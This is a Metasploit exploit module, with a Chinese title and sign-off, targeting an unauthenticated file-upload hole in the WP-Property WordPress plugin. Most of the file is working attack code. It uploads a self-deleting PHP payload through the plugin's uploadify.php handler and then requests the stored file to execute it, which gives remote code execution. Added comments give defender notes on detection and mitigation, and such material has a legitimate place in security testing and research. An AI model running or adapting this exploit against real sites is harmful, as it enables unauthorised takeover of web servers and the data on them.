WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

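require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description). The plugin ships a
# third-party uploadify.php handler that accepts a multipart upload without
# any authentication and stores the file under a web-reachable directory.
#
# Defender notes:
# - Affected sites are those running WP-Property <= 1.35.0; moving to a later
#   release or removing third-party/uploadify/uploadify.php closes the path.
# - The traffic is an unauthenticated POST to
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php with
#   multipart fields "Filedata" (a *.php filename) and "folder", followed by
#   a GET for the stored file. Both show up in web server access logs.
# - Denying script execution in plugin upload directories limits the impact
#   of this whole class of bug.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (references, targets, payload constraints) and
  # the TARGETURI option that points at the WordPress base path.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the vulnerable upload handler with a single GET.
  #
  # Returns CheckCode::Unknown when there is no response or a non-200 status,
  # and CheckCode::Appears otherwise.
  #
  # NOTE(review): a 200 only shows that uploadify.php is reachable; the plugin
  # version is never inspected, so a patched or access-controlled handler that
  # still answers 200 is reported as "Appears". Treat the result as a hint for
  # further verification, not as confirmation.
  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads a randomly named .php file through uploadify.php and then requests
  # the path the handler echoes back.
  #
  # Fails with Failure::UnexpectedReply when the upload response is missing,
  # is not a 200, or does not mention the uploaded file name.
  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Five random letters plus ".php"; the name is not stable across runs, so
    # detection should key on the handler path and on a .php upload, not on a
    # fixed filename.
    @payload_name = "#{rand_text_alpha(5)}.php"
    # :unlink_self asks the PhpEXE mixin for a payload that removes its own
    # file; responders may therefore find no artefact on disk and should rely
    # on access logs for the upload and follow-up request.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Two multipart fields: the file itself ("Filedata") and the destination
    # directory ("folder"), here the uploadify directory itself.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drop the CRLF that precedes a boundary at the start of a line in the
    # serialised message before sending it as the request body.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The handler is expected to answer 200 with a body that contains the
    # stored file name; anything else is treated as a failed upload.
    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the request path of the next GET.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end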
不要问我这写的是什么、怎么利用，我是说 msf。